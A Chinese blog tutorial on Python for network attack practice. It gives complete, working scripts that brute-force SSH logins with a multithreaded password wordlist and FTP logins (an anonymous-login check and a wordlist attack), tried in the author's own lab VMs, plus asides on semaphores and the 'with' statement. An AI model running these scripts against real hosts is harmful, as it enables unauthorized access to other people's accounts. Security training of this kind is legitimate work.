Python中FTP服务与SSH登录暴力破解的实现

作者:Tr0e 时间:2022-12-14 13:25:43 

前言

本文继续学习下 Python 编程在网络攻防领域的应用,主要是通过 Python 脚本进行 SSH 登录爆破和 FTP 服务登录爆破。

SSH爆破

演示环境借助 Kali 虚拟机进行自身的 SSH 服务的登录爆破,注意提前修改/etc/ssh/sshd_config配置文件并执行命令service ssh start运行 SSH 服务。

脚本演示

先来看看代码:


from pexpect import pxssh
import argparse
import threading
import sys

maxConnetions = 5
connect_lock = threading.BoundedSemaphore(value=maxConnetions)

def connect(host, user, password):
   try:
       s = pxssh.pxssh()
       # 登录ssh测试
       s.login(host, user, password)
       print("[+] Password Found: {}".format(password))
       sys.exit(0)
   except pxssh.ExceptionPxssh as e:
       pass

def main():
   # 定义脚本的运行参数、获取用户输入的对应参数值
   parser = argparse.ArgumentParser()
   parser.add_argument('-H', dest='Host', help="like: 192.168.3.1")
   parser.add_argument('-F', dest='passwdFile', help="like: /root/pass.txt")
   parser.add_argument('-u', dest='user')
   args = parser.parse_args()
   host = args.Host
   passwdFile = args.passwdFile
   user = args.user
   # 读取字典文件、使用多线程进行口令爆破
   with open(passwdFile, 'r') as f:
       for line in f.readlines():
           with connect_lock:
               password = line.strip('\n')
               print("[-] Testing: {}".format(password))
               # 起线程每个密码尝试登录一次
               t = threading.Thread(target=connect, args=(host, user, password))
               t.start()

main()

在 Kali 终端运行,运行脚本可使用 -h 参数获得提示,效果如下:

Python中FTP服务与SSH登录暴力破解的实现

最终暴力破解获得密码 root:

Python中FTP服务与SSH登录暴力破解的实现

上述脚本开启 5 个线程连接,开启线程速度会更快是因为这里要远程连接,等待网络有阻塞,故开启多线程可以加快速度(实际上多线程是一个 CPU 在交替运行)。

信号量类

注意到代码中使用threading.BoundedSemaphore(value=maxConnetions)来控制最大线程数量,下面来学习下相关语法知识。

Python 的 threading 线程模块中的 Semaphore 类和 BoundedSemaphore 类来实现并发限制。

  • Semaphore 类和 BoundedSemaphore 类都是信号量类,每次有线程获得信号量(即 acquire() )的时候计数器 -1,释放信号量(release())时候计数器+1,计数器为 0 的时候其它线程就被阻塞无法获得信号量;

  • 当计数器为设定好的上限的时候 BoundedSemaphore 就无法进行 release() 操作了,而 Semaphore 没有这个限制检查。

下面直接通过这两个类的简单示例来学习理解下这两个类在线程控制中的意义。

1、首先看看 Semaphore 类:


# coding: utf-8
import threading
import time

def fun(semaphore, num):
   # 获得信号量,信号量减一
   semaphore.acquire()
   print("Thread %d is running." % num)
   time.sleep(3)
   # 释放信号量,信号量加一
   semaphore.release()

if __name__=='__main__':
   # 初始化信号量,数量为2
   semaphore = threading.Semaphore(2)
   # 运行4个线程
   for num in range(4):
       t = threading.Thread(target=fun, args=(semaphore, num))
       t.start()

代码运行效果:

Python中FTP服务与SSH登录暴力破解的实现

可以注意到线程 0 和 1 是一起打印出消息的,而线程 2 和 3 是在 3 秒后打印的,可以得出每次只有 2 个线程获得信号量,进行打印。

2、接下来看看 BoundedSemaphore 类:


# encoding: UTF-8
import threading
import time

def showfun(n):
   print("%s start -- %d"%(time.ctime(),n))
   print("working")
   time.sleep(2)
   print("%s end -- %d" % (time.ctime(), n))
   semlock.release()

if __name__ == '__main__':
   maxconnections = 5
   semlock = threading.BoundedSemaphore(maxconnections)
   list=[]
   for i in range(8):
       semlock.acquire()
       t=threading.Thread(target=showfun, args=(i,))
       list.append(t)
       t.start()

看看代码运行效果:

Sun Aug 8 18:59:37 2021 start -- 0
working
Sun Aug 8 18:59:37 2021 start -- 1
working
Sun Aug 8 18:59:37 2021 start -- 2
working
Sun Aug 8 18:59:37 2021 start -- 3
working
Sun Aug 8 18:59:37 2021 start -- 4
working
Sun Aug 8 18:59:39 2021 end -- 0
Sun Aug 8 18:59:39 2021 end -- 1
Sun Aug 8 18:59:39 2021 end -- 2
Sun Aug 8 18:59:39 2021 end -- 3
Sun Aug 8 18:59:39 2021 end -- 4
Sun Aug 8 18:59:39 2021 start -- 5
working
Sun Aug 8 18:59:39 2021 start -- 6
working
Sun Aug 8 18:59:39 2021 start -- 7
working
Sun Aug 8 18:59:41 2021 end -- 5
Sun Aug 8 18:59:41 2021 end -- 6
Sun Aug 8 18:59:41 2021 end -- 7

线程数限制到 5 个,因此等待 0-4 完毕之后 5-7 才能请求到资源进行执行。

with 用法

上面代码中注意到还使用了with connect_lock:语句进行信号量的管理,故来学习下 with 关键词的使用。在 Python 中,with 语句适用于对资源进行访问的场合,确保不管使用过程中是否发生异常都会执行必要的“清理”操作,释放资源,比如文件使用后自动关闭/线程中锁的自动获取和释放等。

1、问题引出

如下代码:


file = open("1.txt")
data = file.read()
file.close()

上面代码存在2个问题:

  • 文件读取发生异常,但没有进行任何处理;

  • 可能忘记关闭文件句柄;

2、代码改进


try:
   f = open('xxx')
except:
   print('fail to open')
   exit(-1)
try:
   do something
except:
   do something
finally:
   f.close()

虽然这段代码运行良好,但比较冗长。而使用 with 的话,能够减少冗长,还能自动处理上下文环境产生的异常,如下面代码:


with open("1.txt") as file:
   data = file.read()

3、with 工作原理

  • 紧跟 with 后面的语句被求值后,返回对象的 “–enter–()” 方法被调用,这个方法的返回值将被赋值给 as 后面的变量;

  • 当with后面的代码块全部被执行完之后,将调用前面返回对象的 “–exit–()” 方法。

with 工作原理代码示例:


class Sample:
   def __enter__(self):
       print "in __enter__"
       return "Foo"
   def __exit__(self, exc_type, exc_val, exc_tb):
       print "in __exit__"
def get_sample():
   return Sample()
with get_sample() as sample:
   print "Sample: ", sample

代码的运行结果如下:

in __enter__
Sample: Foo
in __exit__

4、with 作用小结

with 看起来如此简单,但是其背后还有一些工作要做,因为你不能对 python 的任意对象使用 with,它仅能工作于支持上下文管理协议的对象。只有内建了“上下文管理”的对象可以和 with 一起工作,目前支持该协议的对象有:

file
decimal.Context
thread.LockType
threading.Lock
threading.RLock
threading.Condition
threading.Semaphore
threading.BoundedSemaphore

因为上下文管理器主要作用于共享资源,__enter__()__exit__()方法干的基本是需要分配和释放资源的低层次工作,比如数据库连接、锁分配、信号量加/减、状态管理、文件打开和关闭、异常处理等。

FTP爆破

FTP(File Transfer Protocol)即文件传输协议,是一种基于 TCP 的协议,采用客户/服务器模式。通过 FTP 协议,用户可以在FTP服务器中进行文件的上传或下载等操作。虽然现在通过 HTTP 协议下载的站点有很多,但是由于FTP协议可以很好地控制用户数量和宽带的分配,快速方便地上传、下载文件,因此FTP已成为网络中文件上传和下载的首选服务器。

服务搭建

下面演示在 Win10 虚拟机搭建 FTP 服务。

1、打开的【Windows功能】,将 Internet 信息服务的 4 个子功能打勾“√”,然后点击【确定】按钮安装这些功能,图示如下:

Python中FTP服务与SSH登录暴力破解的实现

2、在系统安装配置完成后,打开 IIS 管理器,点击【添加FTP站点】,图示如下:

Python中FTP服务与SSH登录暴力破解的实现3、

输入 FTP 站点名称,以及允许用户访问的目录路径,图示如下:

Python中FTP服务与SSH登录暴力破解的实现

4、在【绑定】IP 中输入你本机的 IP 地址,选择“无SSL”,图示如下:

Python中FTP服务与SSH登录暴力破解的实现

5、身份验证选择“基本”,指定 Win10 的用户 True 可登录,完成配置:

Python中FTP服务与SSH登录暴力破解的实现

6、物理机浏览器输入 ftp://win10虚拟机ip,即可访问创建的 ftp 服务,需要输入账户密码:

Python中FTP服务与SSH登录暴力破解的实现

7、验证完账户密码,即可看到 FTP 服务的目录:

Python中FTP服务与SSH登录暴力破解的实现

点击查看具体文件内容:

Python中FTP服务与SSH登录暴力破解的实现

以上便在局域网内部的 Win10 虚拟机搭建了 FTP 服务,并指定了登录用户为 True。

补充一个概念:匿名FTP服务

匿名 FTP 是这样一种机制:用户可通过它连接到远程主机上,并从其下载文件,而无需成为其注册用户。系统管理员建立了一个特殊的用户 ID,名为anonymous, Internet 上的任何人在任何地方都可使用该用户 ID。

通过 FTP 程序连接匿名 FTP 主机的方式同连接普通 FTP 主机的方式差不多,只是在要求提供用户标识 ID 时必须输入anonymous,该用户 ID 的口令可以是任意的字符串。习惯上,用自己的 E-mail 地址作为口令,使系统维护程序能够记录下来谁在存取这些文件。

匿名扫描

下面先来演示下借助脚本测试 FTP 服务器是否启用匿名登录:


# coding=utf-8
import ftplib

def ftpLogin(hostname):
   try:
       ftp = ftplib.FTP(hostname)
       ftp.login('anonymous', 'Tr0e@123.com')
       print('[*] ' + str(hostname) + ' FTP Anonymous Logon Succeeded.')
       ftp.quit()
       exit(0)
   except Exception as e:
       print('[-] FTP Anonymous Logon Failed.',e)

if __name__ == "__main__":
   ftpLogin("192.168.66.101")

代码运行结果,可见当前 FTP 服务器并不支持匿名登录:

Python中FTP服务与SSH登录暴力破解的实现

可更改 Win10 虚拟机的 FTP 服务配置,启用匿名登录:

Python中FTP服务与SSH登录暴力破解的实现

暴力破解

下面来对 FTP 服务的 True 账户的密码进行暴力破解:


# coding=utf-8
import ftplib

def BruteLogin(hostname, passwdFile):
   pF = open(passwdFile, 'r')
   for line in pF.readlines():
       username = line.split(':')[0]
       password = line.split(':')[1].strip('\r').strip('\n')
       print('[+] Trying: ' + username + '/' + password)
       try:
           ftp = ftplib.FTP(hostname)
           ftp.login(username, password)
           print('[*] ' + str(hostname) + ' FTP Logon Succeeded: ' + username + '/' + password)
           ftp.quit()
           exit(0)
       except Exception as e:
           pass
   print('[-] Could not brubrute force FTP credentials.')
   exit(0)

if __name__=="__main__":
   BruteLogin("192.168.66.101", "pwd.txt")

代码运行效果如下:

Python中FTP服务与SSH登录暴力破解的实现

其中密码字典如下:

Python中FTP服务与SSH登录暴力破解的实现

来源:https://blog.csdn.net/weixin_39190897/article/details/119518398

标签:Python,暴力破解,FTP服务,SSH登录
0
投稿

猜你喜欢

  • Python实现八皇后问题示例代码

    2023-11-23 03:31:40
  • adox 的vbs类,提取表名,列名等

    2008-07-02 12:37:00
  • Python面向对象程序设计之私有变量,私有方法原理与用法分析

    2022-04-17 01:37:50
  • python实现中文输出的两种方法

    2022-08-13 11:59:42
  • Python BeautifulSoup基本用法详解(通过标签及class定位元素)

    2022-11-06 10:50:49
  • try finally 妙用,防止内存泄漏

    2008-03-26 12:52:00
  • Go基础教程系列之defer、panic和recover详解

    2024-02-02 06:34:11
  • php利用新浪接口查询ip获取地理位置示例

    2024-03-22 08:11:29
  • Vue 列表渲染 key的原理和作用详解

    2024-05-03 15:11:21
  • Python使用函数默认值实现函数静态变量的方法

    2023-03-11 16:54:46
  • 在Python中处理日期和时间的基本知识点整理汇总

    2021-05-13 07:12:14
  • PyQt5每天必学之像素图控件QPixmap

    2022-04-05 04:42:54
  • Python3 实现随机生成一组不重复数并按行写入文件

    2021-11-25 18:05:35
  • MySql的事务使用与示例详解

    2024-01-27 17:24:50
  • Python中处理字符串之endswith()方法的使用简介

    2023-02-25 09:05:36
  • 如何恢复MYSQL的ROOT口令

    2024-01-16 15:50:08
  • 使用标准的表单字段名

    2008-06-30 14:14:00
  • Python实现将图像转换为ASCII字符图

    2022-07-15 06:05:20
  • 解决pycharm的Python console不能调试当前程序的问题

    2021-09-08 12:02:42
  • 通过mysqladmin远程管理mysql的方法

    2024-01-16 15:45:20
  • asp之家 网络编程 m.aspxhome.com